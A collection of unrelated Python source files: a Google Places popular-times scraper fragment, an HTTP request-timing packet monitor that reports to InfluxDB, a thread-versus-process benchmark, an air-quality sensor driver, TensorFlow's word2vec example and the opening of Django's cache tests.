time_spent.replace(",", "."))] contains_min, contains_hour = "min" in time_spent, "hour" in time_spent or "hr" in time_spent time_spent = None if contains_min and contains_hour: time_spent = [nums[0], nums[1] * 60] elif contains_hour: time_spent = [nums[0] * 60, (nums[0] if len(nums) == 1 else nums[1]) * 60] elif contains_min: time_spent = [nums[0], nums[0] if len(nums) == 1 else nums[1]] time_spent = [int(t) for t in time_spent] return rating, rating_n, popular_times, current_popularity, time_spent def get_detail(place_id): """ loads data for a given area :return: """ global results # detail_json = get_populartimes(params["API_key"], place_id) detail_json = get_populartimes_by_detail(params["API_key"], g_places[place_id]) if params["all_places"] or "populartimes" in detail_json: results.append(detail_json) def get_populartimes(api_key, place_id): """ sends request to detail to get a search string and uses standard proto buffer to get additional information on the current status of popular times :return: json details """ # places api - detail search # https://developers.google.com/places/web-service/details?hl=de detail_str = DETAIL_URL.format(place_id, api_key) resp = json.loads(requests.get(detail_str, auth=('user', 'pass')).text) check_response_code(resp) detail = resp["result"] return get_populartimes_by_detail(api_key, detail) def get_populartimes_by_detail(api_key, detail): address = detail["formatted_address"] if "formatted_address" in detail else detail.get("vicinity", "") place_identifier = "{} {}".format(detail["name"], address) detail_json = { "id": detail["place_id"], "name": detail["name"], "address": address, "types": detail["types"], "coordinates": detail["geometry"]["location"] } detail_json = add_optional_parameters(detail_json, detail, *get_populartimes_from_search(place_identifier)) return detail_json def check_response_code(resp): """ check if query quota has been surpassed or other errors occured :param resp: json response :return: """ if resp["status"] == "OK" or resp["status"] == "ZERO_RESULTS": return if resp["status"] == "REQUEST_DENIED": raise PopulartimesException("Google Places " + resp["status"], "Request was denied, the API key is invalid.") if resp["status"] == "OVER_QUERY_LIMIT": raise PopulartimesException("Google Places " + resp["status"], "You exceeded your Query Limit for Google Places API Web Service, " "check https://developers.google.com/places/web-service/usage " "to upgrade your quota.") if resp["status"] == "INVALID_REQUEST": raise PopulartimesException("Google Places " + resp["status"], "The query string is malformed, " "check if your formatting for lat/lng and radius is correct.") if resp["status"] == "INVALID_REQUEST": raise PopulartimesException("Google Places " + resp["status"], "The query string is malformed, " "check if your formatting for lat/lng and radius is correct.") if resp["status"] == "NOT_FOUND": raise PopulartimesException("Google Places " + resp["status"], "The place ID was not found and either does not exist or was retired.") raise PopulartimesException("Google Places " + resp["status"], "Unidentified error with the Places API, please check the response code") def run(_params): """ wrap execution logic in method, for later external call :return: """ global params, g_places, q_radar, q_detail, results start = datetime.datetime.now() # shared variables params = _params q_radar, q_detail = Queue(), Queue() g_places, results = dict(), list() logging.info("Adding places to queue...") # threading for radar search for i in range(params["n_threads"]): t = threading.Thread(target=worker_radar) t.daemon = True t.start() # cover search area with circles bounds = params["bounds"] for lat, lng in get_circle_centers([bounds["lower"]["lat"], bounds["lower"]["lng"]], # southwest [bounds["upper"]["lat"], bounds["upper"]["lng"]], # northeast params["radius"]): q_radar.put(dict(pos=(lat, lng), res=0)) q_radar.join() logging.info("Finished in: {}".format(str(datetime.datetime.now() - start))) logging.info("{} places to process...".format(len(g_places))) # threading for detail search and popular times for i in range(params["n_threads"]): t = threading.Thread(target=worker_detail) t.daemon = True t.start() for g_place_id in g_places: q_detail.put(g_place_id) q_detail.join() logging.info("Finished in: {}".format(str(datetime.datetime.now() - start))) return results
collect.py
#!/usr/bin/env python3 from scapy.all import sniff, IP, TCP from scapy.layers.http import HTTPRequest, HTTPResponse from Crypto import Random import os import queue import threading import hashlib import json import hmac import base64 import ipaddress import requests import time ENCODING = 'utf-8' BYTEORDER = 'big' pkts = queue.Queue() reqs = queue.Queue() idMap = {} TIMEUNIT = 1000000000 class TCPIP: def __init__(self, src, dst, sport, dport): self.src = ipaddress.ip_address(src) self.dst = ipaddress.ip_address(dst) self.sport = sport self.dport = dport def __hash__(self): return hash(self.src) ^ hash(self.dst) ^ hash(self.sport) ^ hash(self.dport) def __eq__(self, other): return self.src == other.src and self.dst == other.dst and self.sport == other.sport and self.dport == other.dport def send(): ENDPOINT = 'https://' + INFLUX_ADDR S = requests.Session() while True: req = reqs.get() S.post(ENDPOINT + '/update', json=req) def genreq(payload): tag = {} tag['nonce'] = int.from_bytes(Random.get_random_bytes(16), byteorder=BYTEORDER) expireTime = time.time() + 60 secs = int(expireTime) nanos = int((expireTime - secs) * TIMEUNIT) expires = {} expires['secs'] = secs expires['nanos'] = nanos tag['expires'] = expires tag['payload'] = payload message = json.dumps(tag, separators=(',', ':')) mac = hmac.new(INFLUX_SKEY, msg=bytes(message, ENCODING), digestmod='sha256').digest() sig = base64.b64encode(mac) req = {} req['message'] = message req['sig'] = str(sig, ENCODING) reqs.put(req) def process(): while True: pkt = pkts.get() if pkt.haslayer(HTTPRequest): reqId = pkt[HTTPRequest].X_Request_ID if reqId != None: metrics = {} metrics['time'] = round(pkt.time * TIMEUNIT) metrics['method'] = pkt[HTTPRequest].Method.decode() metrics['uri'] = pkt[HTTPRequest].Path.decode() metrics['name'] = INFLUX_NAME metrics['gateway'] = False tcpip = {} metrics['tcpip'] = tcpip h = hashlib.md5() h.update(reqId) metrics['id'] = int.from_bytes(h.digest(), byteorder=BYTEORDER) src = pkt[IP].src dst = pkt[IP].dst sport = pkt[TCP].sport dport = pkt[TCP].dport tcpip['src'] = src tcpip['dst'] = dst tcpip['sport'] = sport tcpip['dport'] = dport k = TCPIP(src, dst, sport, dport) idMap[k] = metrics elif pkt.haslayer(HTTPResponse): src = pkt[IP].src dst = pkt[IP].dst sport = pkt[TCP].sport dport = pkt[TCP].dport k = TCPIP(dst, src, dport, sport) if k in idMap.keys(): metrics = idMap[k] del idMap[k] newTimestamp = round(pkt.time * TIMEUNIT) metrics['duration'] = newTimestamp - metrics['time'] genreq(metrics) def cap(pkt): pkts.put(pkt) def setup(): global INFLUX_SKEY, INFLUX_ADDR, INFLUX_IFACE, INFLUX_NAME INFLUX_SKEY = os.getenv('INFLUX_SKEY') if INFLUX_SKEY == None: print('Key not set.') exit(-1) INFLUX_SKEY = base64.b64decode(INFLUX_SKEY) INFLUX_ADDR = os.getenv('INFLUX_ADDR') if INFLUX_ADDR == None: print('Address not set.') exit(-1) INFLUX_IFACE = os.getenv('INFLUX_IFACE') if INFLUX_IFACE == None: print('Interface not set.') exit(-1) INFLUX_NAME = os.getenv('INFLUX_NAME') if INFLUX_NAME == None: print('Database not set.') exit(-1) setup() threading.Thread(target=send, daemon=True).start() threading.Thread(target=process, daemon=True).start() sniff(filter='tcp', prn=cap, iface=INFLUX_IFACE, store=False)
thread_process_multicores.py
# 对比多线程和多进程在多核CPU上执行计算密集和IO密集型任务的效率 import threading, multiprocessing import os, time,math # 定义计算密集型任务 def task_cpu(n): x = 0.0 for i in range(2,n): x += sum([math.sin(i) for i in range(i)]) # 定义IO密集型任务 def task_io(n): for _ in range(n): time.sleep(0.005) if __name__ == '__main__': # 测试多线程计算密集型任务 print("启动多线程计算密集型任务") start = time.time() threads = [ threading.Thread(target=task_cpu, args=(3000, )) for i in range(os.cpu_count()) ] for thread in threads: thread.start() for thead in threads: if thread.is_alive(): thread.join() end = time.time() print(f"多线程计算密集型任务耗时:{end-start}秒") # 测试多进程计算密集型任务 print("启动多进程计算密集型任务") start = time.time() processes = [ multiprocessing.Process(target=task_cpu, args=(3000, )) for i in range(os.cpu_count()) ] for process in processes: process.start() for process in processes: if process.is_alive(): process.join() end = time.time() print(f"多进程计算密集型任务耗时:{end-start}秒") # 测试多线程IO密集型任务 print("启动多线程IO密集型任务") start = time.time() threads = [ threading.Thread(target=task_io, args=(100, )) for i in range(os.cpu_count()) ] for thread in threads: thread.start() for thead in threads: if thread.is_alive(): thread.join() end = time.time() print(f"多线程IO密集型任务耗时:{end-start}秒") # 测试多进程IO密集型任务 print("启动多进程IO密集型任务") start = time.time() processes = [ multiprocessing.Process(target=task_io, args=(100, )) for i in range(os.cpu_count()) ] for process in processes: process.start() for process in processes: if process.is_alive(): process.join() end = time.time() print(f"多进程IO密集型任务耗时:{end-start}秒")
dylos.py
import logging from queue import Queue, Empty import subprocess from threading import Thread import Adafruit_BBIO.GPIO as GPIO import Adafruit_BBIO.UART as UART import serial DYLOS_POWER_PIN = "P8_10" TIMEOUT = 5 LOGGER = logging.getLogger(__name__) def setup_sensor(config): return Dylos() class Dylos: def __init__(self, port='/dev/ttyO1', baudrate=9600, timeout=TIMEOUT): self.type = 'output' self.name = 'dylos' self.running = True self.queue = Queue() # Turn off LEDs subprocess.call('echo none > /sys/class/leds/beaglebone\:green\:usr0/trigger', shell=True) subprocess.call('echo none > /sys/class/leds/beaglebone\:green\:usr1/trigger', shell=True) subprocess.call('echo none > /sys/class/leds/beaglebone\:green\:usr2/trigger', shell=True) subprocess.call('echo none > /sys/class/leds/beaglebone\:green\:usr3/trigger', shell=True) # Setup UART UART.setup("UART1") self.ser = serial.Serial(port=port, baudrate=baudrate, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=timeout) if not self.ser.isOpen(): self.ser.open() def start(self): self.thread = Thread(target=self._run) self.thread.start() def _run(self): retries = 0 # Keep reading from serial port until we get some data while self.running: line = self.ser.readline() if not self.running: break if line == b'': if retries > (60 / TIMEOUT) + 2: # Dylos produces a data point every 60 seconds so something # must be wrong. Try starting the Dylos fan. LOGGER.debug("Dylos must be off, so turning it on") GPIO.setup(DYLOS_POWER_PIN, GPIO.OUT) GPIO.output(DYLOS_POWER_PIN, GPIO.LOW) retries = 0 else: try: LOGGER.debug("Read from serial port: %s", line) small, large = [int(x.strip()) for x in line.split(b',')] LOGGER.debug("Small: %s, Large: %s", small, large) self.queue.put((small, large)) except ValueError: LOGGER.error("Unable to parse data from serial port: %s", line) retries = 0 retries += 1 self.ser.close() def read(self): data = [] try: while True: data.append(self.queue.get_nowait()) except Empty: pass if len(data) == 0: return {"pm_small": None, "pm_large": None} smalls, larges = zip(*data) avg_small = sum(smalls) / len(smalls) avg_large = sum(larges) / len(larges) return {"pm_small": int(round(avg_small)), "pm_large": int(round(avg_large))} def stop(self): self.running = False self.thread.join()
word2vec_tf.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Multi-threaded word2vec mini-batched skip-gram model. Trains the model described in: (Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space ICLR 2013. http://arxiv.org/abs/1301.3781 This model does traditional minibatching. The key ops used are: * placeholder for feeding in tensors for each example. * embedding_lookup for fetching rows from the embedding matrix. * sigmoid_cross_entropy_with_logits to calculate the loss. * GradientDescentOptimizer for optimizing the loss. * skipgram custom op that does input processing. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import threading import time from six.moves import xrange # pylint: disable=redefined-builtin import numpy as np import tensorflow as tf word2vec = tf.load_op_library(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'word2vec_ops.so')) flags = tf.app.flags flags.DEFINE_string("save_path", None, "Directory to write the model and " "training summaries.") flags.DEFINE_string("train_data", None, "Training text file. " "E.g., unzipped file http://mattmahoney.net/dc/text8.zip.") flags.DEFINE_string( "eval_data", None, "File consisting of analogies of four tokens." "embedding 2 - embedding 1 + embedding 3 should be close " "to embedding 4." "See README.md for how to get 'questions-words.txt'.") flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.") flags.DEFINE_integer( "epochs_to_train", 15, "Number of epochs to train. Each epoch processes the training data once " "completely.") flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.") flags.DEFINE_integer("num_neg_samples", 100, "Negative samples per training example.") flags.DEFINE_integer("batch_size", 16, "Number of training examples processed per step " "(size of a minibatch).") flags.DEFINE_integer("concurrent_steps", 12, "The number of concurrent training steps.") flags.DEFINE_integer("window_size", 5, "The number of words to predict to the left and right " "of the target word.") flags.DEFINE_integer("min_count", 5, "The minimum number of word occurrences for it to be " "included in the vocabulary.") flags.DEFINE_float("subsample", 1e-3, "Subsample threshold for word occurrence. Words that appear " "with higher frequency will be randomly down-sampled. Set " "to 0 to disable.") flags.DEFINE_boolean( "interactive", False, "If true, enters an IPython interactive session to play with the trained " "model. E.g., try model.analogy(b'france', b'paris', b'russia') and " "model.nearby([b'proton', b'elephant', b'maxwell'])") flags.DEFINE_integer("statistics_interval", 5, "Print statistics every n seconds.") flags.DEFINE_integer("summary_interval", 5, "Save training summary to file every n seconds (rounded " "up to statistics interval).") flags.DEFINE_integer("checkpoint_interval", 600, "Checkpoint the model (i.e. save the parameters) every n " "seconds (rounded up to statistics interval).") FLAGS = flags.FLAGS class Options(object): """Options used by our word2vec model.""" def __init__(self): # Model options. # Embedding dimension. self.emb_dim = FLAGS.embedding_size # Training options. # The training text file. self.train_data = FLAGS.train_data # Number of negative samples per example. self.num_samples = FLAGS.num_neg_samples # The initial learning rate. self.learning_rate = FLAGS.learning_rate # Number of epochs to train. After these many epochs, the learning # rate decays linearly to zero and the training stops. self.epochs_to_train = FLAGS.epochs_to_train # Concurrent training steps. self.concurrent_steps = FLAGS.concurrent_steps # Number of examples for one training step. self.batch_size = FLAGS.batch_size # The number of words to predict to the left and right of the target word. self.window_size = FLAGS.window_size # The minimum number of word occurrences for it to be included in the # vocabulary. self.min_count = FLAGS.min_count # Subsampling threshold for word occurrence. self.subsample = FLAGS.subsample # How often to print statistics. self.statistics_interval = FLAGS.statistics_interval # How often to write to the summary file (rounds up to the nearest # statistics_interval). self.summary_interval = FLAGS.summary_interval # How often to write checkpoints (rounds up to the nearest statistics # interval). self.checkpoint_interval = FLAGS.checkpoint_interval # Where to write out summaries. self.save_path = FLAGS.save_path if not os.path.exists(self.save_path): os.makedirs(self.save_path) # Eval options. # The text file for eval. self.eval_data = FLAGS.eval_data class Word2Vec(object): """Word2Vec model (Skipgram).""" def __init__(self, options, session): self._options = options self._session = session self._word2id = {} self._id2word = [] self.build_graph() self.build_eval_graph() self.save_vocab() def read_analogies(self): """Reads through the analogy question file. Returns: questions: a [n, 4] numpy array containing the analogy question's word ids. questions_skipped: questions skipped due to unknown words. """ questions = [] questions_skipped = 0 with open(self._options.eval_data, "rb") as analogy_f: for line in analogy_f: if line.startswith(b":"): # Skip comments. continue words = line.strip().lower().split(b" ") ids = [self._word2id.get(w.strip()) for w in words] if None in ids or len(ids) != 4: questions_skipped += 1 else: questions.append(np.array(ids)) print("Eval analogy file: ", self._options.eval_data) print("Questions: ", len(questions)) print("Skipped: ", questions_skipped) self._analogy_questions = np.array(questions, dtype=np.int32) def forward(self, examples, labels): """Build the graph for the forward pass.""" opts = self._options # Declare all variables we need. # Embedding: [vocab_size, emb_dim] init_width = 0.5 / opts.emb_dim emb = tf.Variable( tf.random_uniform( [opts.vocab_size, opts.emb_dim], -init_width, init_width), name="emb") self._emb = emb # Softmax weight: [vocab_size, emb_dim]. Transposed. sm_w_t = tf.Variable( tf.zeros([opts.vocab_size, opts.emb_dim]), name="sm_w_t") # Softmax bias: [vocab_size]. sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b") # Global step: scalar, i.e., shape []. self.global_step = tf.Variable(0, name="global_step") # Nodes to compute the nce loss w/ candidate sampling. labels_matrix = tf.reshape( tf.cast(labels, dtype=tf.int64), [opts.batch_size, 1]) # Negative sampling. sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler( true_classes=labels_matrix, num_true=1, num_sampled=opts.num_samples, unique=True, range_max=opts.vocab_size, distortion=0.75, unigrams=opts.vocab_counts.tolist())) # Embeddings for examples: [batch_size, emb_dim] example_emb = tf.nn.embedding_lookup(emb, examples) # Weights for labels: [batch_size, emb_dim] true_w = tf.nn.embedding_lookup(sm_w_t, labels) # Biases for labels: [batch_size, 1] true_b = tf.nn.embedding_lookup(sm_b, labels) # Weights for sampled ids: [num_sampled, emb_dim] sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids) # Biases for sampled ids: [num_sampled, 1] sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids) # True logits: [batch_size, 1] true_logits = tf.reduce_sum(tf.multiply(example_emb, true_w), 1) + true_b # Sampled logits: [batch_size, num_sampled] # We replicate sampled noise labels for all examples in the batch # using the matmul. sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples]) sampled_logits = tf.matmul(example_emb, sampled_w, transpose_b=True) + sampled_b_vec return true_logits, sampled_logits def nce_loss(self, true_logits, sampled_logits): """Build the graph for the NCE loss.""" # cross-entropy(logits, labels) opts = self._options true_xent = tf.nn.sigmoid_cross_entropy_with_logits( labels=tf.ones_like(true_logits), logits=true_logits) sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits( labels=tf.zeros_like(sampled_logits), logits=sampled_logits) # NCE-loss is the sum of the true and noise (sampled words) # contributions, averaged over the batch. nce_loss_tensor = (tf.reduce_sum(true_xent) + tf.reduce_sum(sampled_xent)) / opts.batch_size return nce_loss_tensor def optimize(self, loss): """Build the graph to optimize the loss function.""" # Optimizer nodes. # Linear learning rate decay. opts = self._options words_to_train = float(opts.words_per_epoch * opts.epochs_to_train) lr = opts.learning_rate * tf.maximum( 0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train) self._lr = lr optimizer = tf.train.GradientDescentOptimizer(lr) train = optimizer.minimize(loss, global_step=self.global_step, gate_gradients=optimizer.GATE_NONE) self._train = train def build_eval_graph(self): """Build the eval graph.""" # Eval graph # Each analogy task is to predict the 4th word (d) given three # words: a, b, c. E.g., a=italy, b=rome, c=france, we should # predict d=paris. # The eval feeds three vectors of word ids for a, b, c, each of # which is of size N, where N is the number of analogies we want to # evaluate in one batch. analogy_a = tf.placeholder(dtype=tf.int32) # [N] analogy_b = tf.placeholder(dtype=tf.int32) # [N] analogy_c = tf.placeholder(dtype=tf.int32) # [N] # Normalized word embeddings of shape [vocab_size, emb_dim]. nemb = tf.nn.l2_normalize(self._emb, 1) # Each row of a_emb, b_emb, c_emb is a word's embedding vector. # They all have the shape [N, emb_dim] a_emb = tf.gather(nemb, analogy_a) # a's embs b_emb = tf.gather(nemb, analogy_b) # b's embs c_emb = tf.gather(nemb, analogy_c) # c's embs # We expect that d's embedding vectors on the unit hyper-sphere is # near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim]. target = c_emb + (b_emb - a_emb) # Compute cosine distance between each pair of target and vocab. # dist has shape [N, vocab_size]. dist = tf.matmul(target, nemb, transpose_b=True) # For each question (row in dist), find the top 4 words. _, pred_idx = tf.nn.top_k(dist, 4) # Nodes for computing neighbors for a given word according to # their cosine distance. nearby_word = tf.placeholder(dtype=tf.int32) # word id nearby_emb = tf.gather(nemb, nearby_word) nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True) nearby_val, nearby_idx = tf.nn.top_k(nearby_dist, min(1000, self._options.vocab_size)) # Nodes in the construct graph which are used by training and # evaluation to run/feed/fetch. self._analogy_a = analogy_a self._analogy_b = analogy_b self._analogy_c = analogy_c self._analogy_pred_idx = pred_idx self._nearby_word = nearby_word self._nearby_val = nearby_val self._nearby_idx = nearby_idx def build_graph(self): """Build the graph for the full model.""" opts = self._options # The training data. A text file. (words, counts, words_per_epoch, self._epoch, self._words, examples, labels) = word2vec.skipgram_word2vec(filename=opts.train_data, batch_size=opts.batch_size, window_size=opts.window_size, min_count=opts.min_count, subsample=opts.subsample) (opts.vocab_words, opts.vocab_counts, opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch]) opts.vocab_size = len(opts.vocab_words) print("Data file: ", opts.train_data) print("Vocab size: ", opts.vocab_size - 1, " + UNK") print("Words per epoch: ", opts.words_per_epoch) self._examples = examples self._labels = labels self._id2word = opts.vocab_words for i, w in enumerate(self._id2word): self._word2id[w] = i true_logits, sampled_logits = self.forward(examples, labels) loss = self.nce_loss(true_logits, sampled_logits) tf.summary.scalar("NCE loss", loss) self._loss = loss self.optimize(loss) # Properly initialize all variables. tf.global_variables_initializer().run() self.saver = tf.train.Saver() def save_vocab(self): """Save the vocabulary to a file so the model can be reloaded.""" opts = self._options with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f: for i in xrange(opts.vocab_size): vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8") f.write("%s %d\n" % (vocab_word, opts.vocab_counts[i])) def _train_thread_body(self): initial_epoch, = self._session.run([self._epoch]) while True: _, epoch = self._session.run([self._train, self._epoch]) if epoch != initial_epoch: break def train(self): """Train the model.""" opts = self._options initial_epoch, initial_words = self._session.run([self._epoch, self._words]) summary_op = tf.summary.merge_all() summary_writer = tf.summary.FileWriter(opts.save_path, self._session.graph) workers = [] for _ in xrange(opts.concurrent_steps): t = threading.Thread(target=self._train_thread_body) t.start() workers.append(t) last_words, last_time, last_summary_time = initial_words, time.time(), 0 last_checkpoint_time = 0 while True: time.sleep(opts.statistics_interval) # Reports our progress once a while. (epoch, step, loss, words, lr) = self._session.run( [self._epoch, self.global_step, self._loss, self._words, self._lr]) now = time.time() last_words, last_time, rate = words, now, (words - last_words) / ( now - last_time) print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" % (epoch, step, lr, loss, rate), end="") sys.stdout.flush() if now - last_summary_time > opts.summary_interval: summary_str = self._session.run(summary_op) summary_writer.add_summary(summary_str, step) last_summary_time = now if now - last_checkpoint_time > opts.checkpoint_interval: self.saver.save(self._session, os.path.join(opts.save_path, "model.ckpt"), global_step=step.astype(int)) last_checkpoint_time = now if epoch != initial_epoch: break for t in workers: t.join() return epoch def _predict(self, analogy): """Predict the top 4 answers for analogy questions.""" idx, = self._session.run([self._analogy_pred_idx], { self._analogy_a: analogy[:, 0], self._analogy_b: analogy[:, 1], self._analogy_c: analogy[:, 2] }) return idx def eval(self): """Evaluate analogy questions and reports accuracy.""" # How many questions we get right at precision@1. correct = 0 try: total = self._analogy_questions.shape[0] except AttributeError as e: raise AttributeError("Need to read analogy questions.") start = 0 while start < total: limit = start + 2500 sub = self._analogy_questions[start:limit, :] idx = self._predict(sub) start = limit for question in xrange(sub.shape[0]): for j in xrange(4): if idx[question, j] == sub[question, 3]: # Bingo! We predicted correctly. E.g., [italy, rome, france, paris]. correct += 1 break elif idx[question, j] in sub[question, :3]: # We need to skip words already in the question. continue else: # The correct label is not the precision@1 break print() print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total, correct * 100.0 / total)) def analogy(self, w0, w1, w2): """Predict word w3 as in w0:w1 vs w2:w3.""" wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]]) idx = self._predict(wid) for c in [self._id2word[i] for i in idx[0, :]]: if c not in [w0, w1, w2]: print(c) return print("unknown") def nearby(self, words, num=20): """Prints out nearby words given a list of words.""" ids = np.array([self._word2id.get(x, 0) for x in words]) vals, idx = self._session.run( [self._nearby_val, self._nearby_idx], {self._nearby_word: ids}) for i in xrange(len(words)): print("\n%s\n=====================================" % (words[i])) for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]): print("%-20s %6.4f" % (self._id2word[neighbor], distance)) def _start_shell(local_ns=None): # An interactive shell is useful for debugging/development. import IPython user_ns = {} if local_ns: user_ns.update(local_ns) user_ns.update(globals()) IPython.start_ipython(argv=[], user_ns=user_ns) def main(_): """Train a word2vec model.""" if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path: print("--train_data --eval_data and --save_path must be specified.") sys.exit(1) opts = Options() with tf.Graph().as_default(), tf.Session() as session: with tf.device("/cpu:0"): model = Word2Vec(opts, session) model.read_analogies() # Read analogy questions for _ in xrange(opts.epochs_to_train): model.train() # Process one epoch model.eval() # Eval analogies. # Perform a final save. model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"), global_step=model.global_step) if FLAGS.interactive: # E.g., # [0]: model.analogy(b'france', b'paris', b'russia') # [1]: model.nearby([b'proton', b'elephant', b'maxwell']) _start_shell(locals()) if __name__ == "__main__": tf.app.run()
tests.py
# Unit tests for cache framework # Uses whatever cache backend is set in the test settings file. import copy import io import os import pickle import re import shutil import tempfile import threading import time import unittest import warnings from unittest import mock from django.conf import settings from django.core import management, signals from django.core.cache import ( DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches, ) from django.core.cache.utils import make_template_fragment_key from django.db import close_old_connections, connection, connections from django.http import ( HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse, ) from django.middleware.cache import ( CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware, ) from django.middleware.csrf import CsrfViewMiddleware from django.template import engines from django.template.context_processors import csrf from django.template.response import TemplateResponse from django.test import ( RequestFactory, SimpleTestCase, TestCase, TransactionTestCase, override_settings, ) from django.test.signals import setting_changed from django.utils import timezone, translation from django.utils.cache import ( get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers, ) from django.views.decorators.cache import cache_control, cache_page from .models import Poll, expensive_calculation # functions/classes for complex data type tests def f(): return 42 class C: def m(n): return 24 class Unpicklable: def __getstate__(self): raise pickle.PickleError() KEY_ERRORS_WITH_MEMCACHED_MSG = ( 'Cache key contains characters that will cause errors if used with ' 'memcached: %r' ) @override_settings(CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.dummy.DummyCache', } }) class DummyCacheTests(SimpleTestCase): # The Dummy cache backend doesn't really behave like a test backend, # so it has its own test case. def test_simple(self): "Dummy cache backend ignores cache set calls" cache.set("key", "value") self.assertIsNone(cache.get("key")) def test_add(self): "Add doesn't do anything in dummy cache backend" cache.add("addkey1", "value") result = cache.add("addkey1", "newvalue") self.assertTrue(result) self.assertIsNone(cache.get("addkey1")) def test_non_existent(self): "Nonexistent keys aren't found in the dummy cache backend" self.assertIsNone(cache.get("does_not_exist")) self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!") def test_get_many(self): "get_many returns nothing for the dummy cache backend" cache.set('a', 'a') cache.set('b', 'b') cache.set('c', 'c') cache.set('d', 'd') self.assertEqual(cache.get_many(['a', 'c', 'd']), {}) self.assertEqual(cache.get_many(['a', 'b', 'e']), {}) def test_get_many_invalid_key(self): with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'): cache.get_many(['key with spaces']) def test_delete(self): "Cache deletion is transparently ignored on the dummy cache backend" cache.set("key1", "spam") cache.set("key2", "eggs") self.assertIsNone(cache.get("key1")) cache.delete("key1") self.assertIsNone(cache.get("key1")) self.assertIsNone(cache.get("key2")) def test_has_key(self): "The has_key method doesn't ever return True for the dummy cache backend" cache.set("hello1", "goodbye1") self.assertFalse(cache.has_key("hello1")) self.assertFalse(cache.has_key("goodbye1")) def test_in(self): "The in operator doesn't ever return True for the dummy cache backend" cache.set("hello2", "goodbye2") self.assertNotIn("hello2", cache) self.assertNotIn("goodbye2", cache) def test_incr(self): "Dummy cache values can't be incremented" cache.set('answer', 42) with self.assertRaises(ValueError): cache.incr('answer') with self.assertRaises(ValueError): cache.incr('does_not_exist') def test_decr(self): "Dummy cache values can't be decremented" cache.set('answer', 42) with self.assertRaises(ValueError): cache.decr('answer') with self.assertRaises(ValueError): cache.decr('does_not_exist') def test_data_types(self): "All data types are ignored equally by the dummy cache" stuff = { 'string': 'this is a string', 'int': 42, 'list': [1, 2, 3, 4], 'tuple': (1, 2, 3, 4), 'dict': {'A': 1, 'B': 2}, 'function': f, 'class': C, } cache.set("stuff", stuff) self.assertIsNone(cache.get("stuff")) def test_expiration(self): "Expiration has no effect on the dummy cache" cache.set('expire1', 'very quickly', 1) cache.set('expire2', 'very quickly', 1) cache.set('expire3', 'very quickly', 1) time.sleep(2) self.assertIsNone(cache.get("expire1")) cache.add("expire2", "newvalue") self.assertIsNone(cache.get("expire2")) self.assertFalse(cache.has_key("expire3")) def test_unicode(self): "Unicode values are ignored by the dummy cache" stuff = { 'ascii': 'ascii_value', 'unicode_ascii': 'Iñtërnâtiônàlizætiøn1', 'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2', 'ascii2': {'x': 1} } for (key, value) in stuff.items(): with self.subTest(key=key): cache.set(key, value) self.assertIsNone(cache.get(key)) def test_set_many(self): "set_many does nothing for the dummy cache backend" self.assertEqual(cache.set_many({'a': 1, 'b': 2}), []) self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), []) def test_set_many_invalid_key(self): with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'): cache.set_many({'key with spaces': 'foo'}) def test_delete_many(self): "delete_many does nothing for the dummy cache backend" cache.delete_many(['a', 'b']) def test_delete_many_invalid_key(self): with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'): cache.delete_many({'key with spaces': 'foo'}) def test_clear(self): "clear does nothing for the dummy cache backend" cache.clear() def test_incr_version(self): "Dummy cache versions can't be incremented" cache.set('answer', 42) with self.assertRaises(ValueError): cache.incr_version('answer') with self.assertRaises(ValueError): cache.incr_version('does_not_exist') def test_decr_version(self): "Dummy cache versions can't be decremented" cache.set('answer', 42) with self.assertRaises(ValueError): cache.decr_version('answer') with self.assertRaises(ValueError): cache.decr_version('does_not_exist') def test_get_or_set(self): self.assertEqual(cache.get_or_set('mykey', 'default'), 'default') self.assertEqual(cache.get_or_set('mykey', None), None) def test_get_or_set_callable(self): def my_callable(): return 'default' self.assertEqual(cache.get_or_set('mykey', my_callable), 'default') self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default') def custom_key_func(key, key_prefix, version): "A customized cache key function" return 'CUSTOM-' + '-'.join([key_prefix, str(version), 